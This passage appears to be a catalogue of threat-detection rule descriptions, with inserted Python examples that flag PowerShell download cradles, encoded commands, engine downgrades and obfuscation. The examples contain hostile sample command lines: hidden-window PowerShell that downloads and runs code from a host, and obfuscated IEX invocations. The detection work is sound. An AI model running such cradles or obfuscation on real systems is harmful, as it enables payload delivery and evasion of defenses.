Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)
Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.
Detects suspicious scheduled task creations from a parent stored in a temporary folder
Possible payload obfuscation
Detects process start from rare or uncommon folders like temporary folder or folders that usually don’t contain executable files
Detects the usage of the unsafe bpftrace option
Uninstall an application with wmic
Detects the use of RunXCmd tool for command execution
Detects the use of NSudo tool for command execution
Detects the use of NirCmd tool for command execution as SYSTEM user
Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity
Detects driver load events that got blocked by Windows code integrity checks
Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system
Detects legitimate Sysinternals Suite tools that have been renamed to evade detection
Detects shell32.dll executing a DLL in a suspicious directory
Identifies when an Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
Identifies when a Google Cloud Kubernetes CronJob runs in Google Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
Detects the creation of tasks from processes executed from suspicious locations
Detects use of the ExecutionPolicy option to set an insecure policy
Detects exploitation of OMIGOD (CVE-2021-38647), which allows remote code execution (RCE) as root with a single unauthenticated HTTP request. Verify successful exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP); the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. The script being executed is created as a temp file in the /tmp folder with an scx* prefix, then invoked from the directory /etc/opt/microsoft/scx/conf/tmpdir/; the file in that directory has the same scx* prefix. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
Identifies when a new Cloud Shell is created inside the Azure portal.
Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.
This rule will monitor any Office app that spins up a new LOLBin process. This activity is highly suspicious and should be investigated.
This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed.
Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32
Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.
Detects Commandlet names from ShellIntel exploitation scripts.
Adversaries can use the built-in expand utility to decompress CAB files, as seen in the MeteorExpress attack against Iranian targets
Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.
Detects process patterns found in Cobalt Strike beacon activity (see reference for more details)
Detects different hacktools used for relay attacks on Windows for privilege escalation
Detects suspicious mshta process patterns
Detects a regsvr32.exe execution that does not contain a DLL in the command line
Detects execution of ADRecon.ps1 for AD reconnaissance, which has been reported to be actively used by FIN7
Detects suspicious script executions from a temporary folder
Detects suspicious print spool service (spoolsv.exe) child processes.
Detects Commandlet names from PowerView of PowerSploit exploitation framework.
Detects different process creation events as described in Malwarebytes’s threat report on Lazarus group activity
Detects different process creation events as described in various threat reports on Lazarus group activity
Detects different loaders as described in various threat reports on Lazarus group activity
Detects Trickbot malware process tree pattern in which rundll32.exe is parent of wermgr.exe
Detects the user-accept-agreement (EULA acceptance) flag in a PsExec command line
Detects WMI executing rundll32
Detects triggering of AMSI by Windows Defender.
Detects specific process characteristics of Snatch ransomware word document droppers
Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
Detects blocking of process creations originating from PSExec and WMI commands
Detects execution of files that AppLocker does not allow. AppLocker is a very useful tool, especially on servers where unprivileged users have access, for example terminal servers. You need to configure AppLocker and log collection to receive these events.
Detects a space after a filename
Detects a suspicious PowerShell process whose command line includes the -bxor operator, an alternative obfuscation method to base64-encoded commands.
Detects all actions taken by Windows Defender malware detection engines
Detects the usage of path traversal in cmd.exe, indicating possible command/argument confusion or hijacking
Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048
Detects suspicious network connection by Notepad
Detects specific process characteristics of Maze ransomware word document droppers
Detects creation of a local user via PowerShell
Detects parameters used by WMImplant
Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
Detects DLLs loaded via Word documents containing VBA macros
Detects any GAC DLL being loaded by an Office Product
Detects any assembly DLL being loaded by an Office Product
Detects CLR DLL being loaded by an Office Product
Detects DSParse DLL being loaded by an Office Product
Detects Kerberos DLL being loaded by an Office Product
Detects command line parameters used by Koadic hack tool
Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.
Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
Detects events generated by Windows to indicate the exploitation of a known vulnerability (e.g. CVE-2020-0601)
The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
Detects DLLs loaded via Word documents containing VBA macros that execute WMI commands
Detects activity mentioned in Operation Wocao report
Detects command line parameters used by Bloodhound and Sharphound hack tools
Detects the Silence group's EmpireDNSAgent
Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
Detects manual service execution (start) via system utilities.
Launch 64-bit shellcode from a debugger script file using cdb.exe.
Execute VBscript code that is referenced within the *.bgi file.
Detects network connections and DNS queries initiated by Regsvr32.exe
Dnscat exfiltration tool execution
Detects processes other than wmiprvse loading WMI modules
Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986
Detects remote PowerShell sessions
Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.
Detects non-interactive PowerShell activity by looking for powershell.exe whose parent is not explorer.exe.
Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
Detects the use of various web request methods with command-line tools or Windows PowerShell commands (including aliases)
Detects a method to load DLL via LSASS process using an undocumented Registry key
Detects all Emotet like process executions that are not covered by the more generic rules
Detects the malicious use of a control panel item
Detects events that are generated when using the hacktool Ruler by SensePost
Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.
Detects Commandlet names and arguments from the Nishang exploitation framework
Detects suspicious powershell command line parameters used in Empire
Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
Detects activity that could be related to Baby Shark malware
Detects new registry key created by Ursnif malware.
Detects keywords that could indicate the use of some PowerShell exploitation framework
Detects URL pattern used by iOS Implant
Detects suspicious file execution by wscript and cscript
Detects wscript/cscript executions of scripts located in user directories
Detects a suspicious child process of a Windows shell
Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)
Detects WMI executing suspicious commands
Detects suspicious process related to rasdial.exe
Detects suspicious PowerShell invocation with a parameter substring
Detects suspicious powershell invocations from interpreters or unusual programs
Detects suspicious PowerShell process starts with base64-encoded commands (e.g. Emotet)
Detects the creation of scheduled tasks in user session
Detects multiple suspicious processes in a limited timeframe
Detects a PsExec service start
Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
Detects a Powershell process that contains download commands in its command line string
Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
Detects a Windows command and scripting interpreter executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio
Detects base64 encoded strings used in hidden malicious PowerShell command lines
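The download-cradle and encoded-command descriptions above (case-insensitive download patterns, the WebClient + DownloadFile combination in one command line, and base64-encoded hidden command lines) are easiest to understand with the matching logic run over sample command lines. The following Python is an added example, not a Sigma rule or code from this page: the sample command lines are constructed, and the indicator list and the handling of abbreviated -EncodedCommand / -WindowStyle flags are this example's own assumptions.

```python
import base64
import binascii
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc,
# -encoded, ...), so the matcher enumerates all of them instead of hard-coding "-enc".
_ENC_FLAGS = {"encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)} | {"ec"}
_ENC_RE = re.compile(
    r"(?:^|\s)[-/](?:" + "|".join(sorted(_ENC_FLAGS, key=len, reverse=True))
    + r")\s+([A-Za-z0-9+/=]{8,})",
    re.IGNORECASE,
)
# Same trick for -WindowStyle hidden (-w hidden, -win hidden, ...).
_WIN_FLAGS = {"windowstyle"[:i] for i in range(1, len("windowstyle") + 1)}
_HIDDEN_RE = re.compile(
    r"\s-(?:" + "|".join(sorted(_WIN_FLAGS, key=len, reverse=True)) + r")\s+hidden\b",
    re.IGNORECASE,
)

# Substrings typical of download cradles (assumed list); compared against a lower-cased
# haystack, which is what "apply the strings case-insensitive" means in practice.
DOWNLOAD_INDICATORS = (
    "net.webclient", "downloadfile(", "downloadstring(", "downloaddata(",
    "invoke-webrequest", "iwr ", "invoke-restmethod", "start-bitstransfer",
    "bitsadmin", "iex ", "invoke-expression",
)


def encode_for_powershell(script: str) -> str:
    """Build the blob -EncodedCommand expects: base64 over UTF-16LE, not UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -EncodedCommand, or None if there is none."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # not a real -enc payload (e.g. a word that merely looks like base64)


def analyze_powershell_cmdline(cmdline: str) -> dict:
    """Apply the download indicators to the raw command line AND the decoded payload."""
    decoded = decode_encoded_command(cmdline)
    haystack = (cmdline + " " + (decoded or "")).lower()
    hits = sorted(i for i in DOWNLOAD_INDICATORS if i in haystack)
    return {
        "decoded": decoded,
        "hidden_window": bool(_HIDDEN_RE.search(cmdline)),
        "download_indicators": hits,
        # the narrower rule: powershell + WebClient object + DownloadFile in one command line
        "webclient_downloadfile": all(s in haystack for s in ("powershell", "net.webclient", "downloadfile(")),
        "suspicious": bool(hits),
    }


# Constructed sample command lines (not taken from any real incident or report).
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')"
SAMPLES = {
    "plain": r'''powershell.exe -nop -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://10.0.0.5/a.exe','C:\Users\Public\a.exe')"''',
    "encoded": "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_for_powershell(SCRIPT),
    "benign": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\Inventory.ps1",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(name, analyze_powershell_cmdline(cmd))
```

Two points the rules depend on: the blob after -enc is base64 over UTF-16LE (decoding it as UTF-8 yields a null byte between characters), and the indicators must be checked against the decoded text as well, otherwise an encoded cradle never matches the plain-text patterns.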
Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
Detects a suspicious command line execution that includes a URL and an AppData string in the command line parameters, as used by several droppers (js/vbs > powershell)
Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
Detects executables in the Downloads folder without FileVersion, Description, Product or Company, likely created with py2exe
Detects Base64 encoded Shellcode
Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
Detects various indicators of Microsoft Connection Manager Profile Installer execution
Detects PowerShell remote thread creation in Rundll32.exe
Detects the creation of a scheduled task via PowerSploit or Empire in their default configuration.
Detects the use of smbexec.py tool by detecting a specific service installation
Detects Elise backdoor activity as used by APT32
Detects relevant commands often related to malware or hacking activity
Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks.
Detects a ZxShell start by the called and well-known function name
Detects PsExec service installation and execution events (service and Sysmon)
Detects a PowerShell downgrade attack by comparing the host version with the engine version actually used (2.0)
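The downgrade rule above works on event 400 in the classic Windows PowerShell log, whose message carries HostVersion and EngineVersion as key=value lines. As an added example (not code from this page or any Sigma rule), the following Python parses constructed event 400 messages and applies the comparison; the sample host names and version numbers are illustrative, not taken from a real host.

```python
import re

_DETAIL_RE = re.compile(r"^\s*(\w+)=(.*?)\s*$", re.MULTILINE)


def parse_details(message: str) -> dict:
    """Turn the 'Key=Value' lines of an event 400 message into a dict."""
    return dict(_DETAIL_RE.findall(message))


def is_engine_downgrade(event: dict) -> bool:
    """Event 400 with a 2.x engine started by a non-2.x host is the downgrade signature."""
    if event.get("EventID") != 400:
        return False
    d = parse_details(event.get("Message", ""))
    engine, host = d.get("EngineVersion", ""), d.get("HostVersion", "")
    return engine.startswith("2.") and not host.startswith("2.")


def find_downgrades(events) -> list:
    """Return (index, HostName) for every downgrade event in a batch."""
    return [(i, parse_details(e["Message"]).get("HostName"))
            for i, e in enumerate(events) if is_engine_downgrade(e)]


def _event(host_name: str, host_version: str, engine_version: str) -> dict:
    """Constructed event 400 record laid out like the classic 'Windows PowerShell' log."""
    return {"EventID": 400, "Message": (
        "Engine state is changed from None to Available.\n\nDetails:\n"
        "\tNewEngineState=Available\n\tPreviousEngineState=None\n\n"
        f"\tHostName={host_name}\n\tHostVersion={host_version}\n"
        f"\tEngineVersion={engine_version}\n\tRunspaceId=\n\tCommandLine=\n"
    )}


# Constructed samples (versions are illustrative).
SAMPLE_EVENTS = [
    _event("ConsoleHost", "5.1.19041.1320", "2.0"),             # v5 host runs a v2 engine: downgrade
    _event("ConsoleHost", "5.1.19041.1320", "5.1.19041.1320"),  # normal session
    _event("ConsoleHost", "2.0", "2.0"),                        # genuine v2-only installation
    _event("ServerRemoteHost", "1.0.0.0", "5.1.19041.1320"),    # remoting host: mismatch, but no v2 engine
]

if __name__ == "__main__":
    print(find_downgrades(SAMPLE_EVENTS))
```

A HostVersion/EngineVersion mismatch by itself is not the signal (remoting hosts report a different host version routinely); only a 2.x engine under a newer host is. Removing the v2 engine (the MicrosoftWindowsPowerShellV2Root optional feature) closes the downgrade path entirely and is the preferable fix where nothing depends on it.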
Detects suspicious shell commands used in various exploit codes (see references)
Detects executable downloads from suspicious remote systems
Detects a PowerShell process that opens network connections; check for suspicious target ports and target systems and adjust to your environment (e.g. extend filters with the company's IP range)
Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292. You will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.
Detects suspicious PowerShell invocation command parameters
Detects possible usage of the Windows Subsystem for Linux (WSL) binary as a LOLBIN
Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network and loading it for a WMI DLL hijack scenario.
Detects WMI spawning PowerShell
An adversary might use WMI to check if a certain remote service is running on a remote device. When the test completes, service information is displayed on the screen if the service exists. A common feedback message is "No instance(s) Available" if the queried service is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
Detects the WMI Event Consumer service scrcons.exe creating a named pipe
Detects code execution via the Windows Update client (wuauclt)
Detects suspicious child process creations of VMware Tools process which may indicate persistence setup
Detects using SettingSyncHost.exe to run hijacked binary
The Application Virtualization Utility (AppVLP) is included with Microsoft Office. It can be abused to execute shell commands. Normally this binary is used for Application Virtualization, but it can be used to circumvent the ASR file path rule folder or to mark a file as a system file.
Detects Ursnif C2 traffic.
A Sigma rule detecting an unidentified attacker who used phishing emails to target high-profile organizations in November 2018. The actor shares some TTPs with the YTTRIUM/APT29 campaign in 2016.
Detects specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries
Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
Detects a named pipe used by Turla group samples
Detects automated lateral movement by Turla group
Detects commands used by Turla group as reported by ESET in May 2020
Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
Detects specific process characteristics of Chinese TAIDOOR RAT malware load
Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents
Detects execution of PowerShell
Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network for a WMI DLL hijack scenario.
Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd
ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
An adversary might use WMI to list Processes running on the compromised host or list installed Software hotfix and patches.
Detects the execution of CSharp interactive console by PowerShell
Detects the creation of scheduled tasks that involves a temporary folder and runs only once
Detects execution of powershell scripts via Runscripthelper.exe
Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell
Detects commands that add a new printer port pointing to a suspicious file
Detects suspicious PowerShell invocation command parameters
Detects suspicious PowerShell download command
Detects PowerShell command lines with special characters
Detects PowerShell command lines with reversed strings
Detects a suspicious parent of csc.exe, which could be a sign of payload delivery
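The bxor, special-character and reversed-string descriptions above are all heuristics over the command line text, and they work best scored together. The following Python is an added example, not code from this page or from any Sigma rule: the character set, the 0.15 ratio threshold, the reversal idioms, the keyword list (deliberately limited to long words) and the sample command lines are this example's own assumptions.

```python
import re

# Characters that pile up in Invoke-Obfuscation-style command lines (an assumed set,
# not the exact character list of any published rule).
_OBF_CHARS = set("`^+{}'\"")
# Keywords searched for in reversed form; 3-letter ones such as "iex" are left out
# because their reversal ("xei") is too short to be meaningful.
_KEYWORDS = ("invoke-expression", "invoke-webrequest", "downloadstring", "downloadfile",
             "net.webclient", "frombase64string", "new-object")
# Idioms used to flip a reversed string back: [array]::Reverse, $s[-1..-($s.Length)], -join $s[-1
_REVERSE_IDIOM = re.compile(r"\[array\]::reverse|\[-1\.\.-|-join\s*\(?\s*\$\w+\[\s*-1", re.IGNORECASE)
_FORMAT_OP = re.compile(r"""["']\s*-f\s*["']""")         # ("{1}{0}" -f 'tring','DownloadS')
_CHAR_CONCAT = re.compile(r"'\w{1,3}'\s*\+\s*'\w{1,3}'")  # ('I'+'E'+'X')


def special_char_ratio(cmdline: str) -> float:
    """Share of obfuscation characters in the command line."""
    return sum(c in _OBF_CHARS for c in cmdline) / max(len(cmdline), 1)


def reversed_keywords(cmdline: str) -> list:
    """Keywords that appear spelled backwards (e.g. tneilCbeW.teN)."""
    low = cmdline.lower()
    return sorted(k for k in _KEYWORDS if k[::-1] in low)


def score_obfuscation(cmdline: str, ratio_threshold: float = 0.15) -> dict:
    """Collect the obfuscation indicators present in one PowerShell command line."""
    low = cmdline.lower()
    rev = reversed_keywords(cmdline)
    ratio = special_char_ratio(cmdline)
    checks = (
        ("bxor", re.search(r"-bxor\b", low) is not None),
        ("reversed_keyword", bool(rev)),
        ("reverse_idiom", _REVERSE_IDIOM.search(cmdline) is not None),
        ("format_operator", _FORMAT_OP.search(cmdline) is not None),
        ("char_concat", _CHAR_CONCAT.search(cmdline) is not None),
        ("special_chars", ratio >= ratio_threshold),
    )
    return {
        "indicators": [name for name, hit in checks if hit],
        "reversed": rev,
        "special_char_ratio": round(ratio, 3),
    }


# Constructed sample command lines (not taken from any real incident or report).
SAMPLES = {
    "bxor": r'''powershell.exe -nop -c "$k=0x41;$p=[IO.File]::ReadAllBytes('C:\Users\Public\s.bin');$d=$p|%{$_ -bxor $k};[Text.Encoding]::ASCII.GetString($d)|IEX"''',
    "reversed": r'''powershell.exe -c "$s='tneilCbeW.teN tcejbO-weN';$r=-join $s[-1..-($s.Length)];IEX $r"''',
    "special": r'''powershell.exe -c "&('I'+'E'+'X') (("{1}{0}" -f 'tring','DownloadS'))"''',
    "benign": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\Backup.ps1",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(name, score_obfuscation(cmd))
```

Each indicator on its own is noisy (legitimate scripts use -f and string concatenation too), so tune the ratio threshold against a baseline of your own PowerShell command lines and alert on combinations rather than single hits.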
Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.
Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL
Detects renamed ftp.exe, ftp.exe script execution and child processes run by ftp.exe
Command line to launch PowerShell with a base64 payload
Detects EnableUnsafeClientMailRules used for Script Execution from Outlook
Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance.
Detects suspicious encoded payloads in WMI Event Consumers
Detects schtasks.exe creating a task from a user's AppData\Local\Temp folder
Detects suspicious .NET assembly executions. Could detect using Cobalt Strike’s command execute-assembly.
Detects possible use of the Squirrel package manager as a LOLBIN
This rule detects execution of PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with Microsoft SQL Server Management Studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
Detects possible remote connections to a SILENTTRINITY C2
Detects suspicious script executions in temporary folders or folders accessible via environment variables
Detects a suspicious child process of Script Event Consumer (scrcons.exe).
Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \TASKNAME
Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
Detects Ryuk Ransomware command lines
Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
Detects PowerShell script execution via input stream redirect
Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
Detects renamed powershell
Detects renamed jusched.exe used by cobalt group
Detects the presence of a registry key created during Azorult execution
Detects actions caused by the RedMimicry Winnti playbook
Detects QBot like process executions
Detects a ProcessHacker tool that elevated privileges to a very high level
Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.
Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code
Detects powershell script installed as a Service
Detects the Nishang Invoke-PowerShellTcpOneLine reverse shell
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system
Detects the use of PSAttack PowerShell hack tool
Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems
Detects suspicious encoded character syntax often used for defense evasion
Detects PowerShell calling a credential prompt
Detects PowerShell called from an executable by the version mismatch method
Detects PowerShell code written to the registry as a service.
Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675
Detects processes creating temp files related to PCRE.NET package
Detects processes loading modules related to PCRE.NET package
A general detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.
Detects a suspicious child process of a mshta.exe process
Detects an executable in the users directory started from Microsoft Word, Excel, Powerpoint, Publisher or Visio
Adversaries can abuse wuauclt.exe (Windows Update client) to achieve code execution by specifying an arbitrary DLL.
Adversaries can abuse winget to download payloads remotely and execute them without touching disk. Winget is included by default in Windows 10 and was first available through the Windows Insider program. The manifest option installs an application by passing a YAML file directly to the client. Winget can be used to download and install EXE, MSI and MSIX files.
Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of “-Embedding” as a child of svchost.exe
Windows DCE-RPC functions that indicate execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE
Detects keywords from well-known PowerShell exploitation frameworks
Detects Commandlet names from well-known PowerShell exploitation frameworks
Detects the creation of known powershell scripts for exploitation
Detects execution of AppleScript, the macOS scripting language.
Detection of logins performed with WMI
Detects the process injection of a LittleCorporal generated Maldoc.
This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. Account Name within the event contains the compromised user account name. This event should be correlated with 4624 and 4688 for further intrusion context.
Detects a suspicious command sequence used by JexBoss
Detects Obfuscated Powershell via use Rundll32 in Scripts
Detects Obfuscated Powershell via use MSHTA in Scripts
Detects Obfuscated Powershell via use Clip.exe in Scripts
Detects Obfuscated Powershell via Stdin in Scripts
Detects Obfuscated Powershell via VAR++ LAUNCHER
Detects Obfuscated use of Environment Variables to execute PowerShell
Detects Obfuscated use of stdin to execute PowerShell
Detects Obfuscated Powershell via RUNDLL LAUNCHER
Detects Obfuscated Powershell via COMPRESS OBFUSCATION
Detects Obfuscated use of Clip.exe to execute PowerShell
Detects indirect command execution via the Program Compatibility Assistant, pcwrun.exe
Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)
Detects events that appear when a user clicks on a link file with a PowerShell command in it
Detects tools and process executions as observed in a Greenbug campaign in May 2020
Adversaries can abuse the C:\Windows\System32\gatherNetworkInfo.vbs script along with cscript.exe to gather information about the target
A symbolic link is a type of file that contains a reference to another file. This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt
Detects Archer malware invocation via rundll32
Detects using Diskshadow.exe to execute arbitrary code in text file
Detects file execution using the msdeploy.exe lolbin
Detects code execution via Pester.bat (Pester, a PowerShell module for testing)
Detects adding and using Exchange PowerShell snap-ins to export mailbox data by HAFNIUM
Detects suspicious shell commands used in various Equation Group scripts and tools
Detects specific combinations of encoding methods in the PowerShell command lines
Detects download of certain file types from hosts in suspicious TLDs
dotnet.exe can be used to execute any DLL, including unsigned code
Detects Dllhost that communicates with public IP addresses
This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
Detects DarkSide Ransomware and helpers
Detects a suspicious process pattern found in CVE-2021-40444 exploitation
Detects possible successful exploitation of the vulnerability described in CVE-2021-26858 by looking for creation of non-standard files on disk by Exchange Server's Unified Messaging service, which could indicate dropping web shells or other malicious content
Detects possible successful exploitation of the vulnerability described in CVE-2021-26857 by looking for abnormal subprocesses spawned by Exchange Server's Unified Messaging service
Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527
Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675
Adversaries may abuse Visual Basic (VB) for execution
Detects well-known credential dumping tools execution via service execution events
The CrackMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
Detect various execution methods of the CrackMapExec pentesting framework
Detects suspicious command lines used in Covenant launchers
Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement. This can also be caught via System log event 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml). In some SIEMs these events can also be seen in HKLM\System\ControlSet001\Services or HKLM\System\ControlSet002\Services; this rule, however, is based on regular Sysmon events.
Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
Detects a typical pattern of a CobaltStrike BOF that injects into other processes
Detects CLR DLL being loaded by scripting applications
Detects remote thread creation from CACTUSTORCH as described in references.
Detects base64 encoded .NET reflective loading of Assembly
Detects base64 encoded listing Win32_Shadowcopy
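The two descriptions above match keywords inside base64 without decoding it. Because base64 encodes 3 bytes into 4 characters, a keyword has three possible spellings depending on its byte offset mod 3, and the characters that also depend on the neighbouring bytes have to be dropped; this is what Sigma's base64offset modifier computes. The following Python is an added example (not code from this page or from the Sigma project) that generates those variants for both the UTF-8 and the UTF-16LE (powershell -enc) form of a keyword and runs them over constructed -enc blobs; the keyword list and sample script are this example's own.

```python
import base64

# Stripping rules: characters at the start/end that also depend on neighbouring bytes
# are dropped, so the remainder appears verbatim wherever the value sits in the stream.
_START = (0, 2, 3)                 # leading chars to skip for offset 0, 1, 2
_END = {0: None, 1: -3, 2: -2}     # trailing chars to drop, keyed by (len + offset) % 3


def base64_offset_variants(value: bytes) -> list:
    """The three base64 spellings of `value`, one per possible offset mod 3."""
    variants = []
    for shift in range(3):
        enc = base64.b64encode(b"\x00" * shift + value).decode("ascii")
        variants.append(enc[_START[shift]:_END[(len(value) + shift) % 3]])
    return variants


def keyword_variants(keyword: str) -> dict:
    """Variants for both the UTF-8 and the UTF-16LE byte form of a keyword."""
    out = {}
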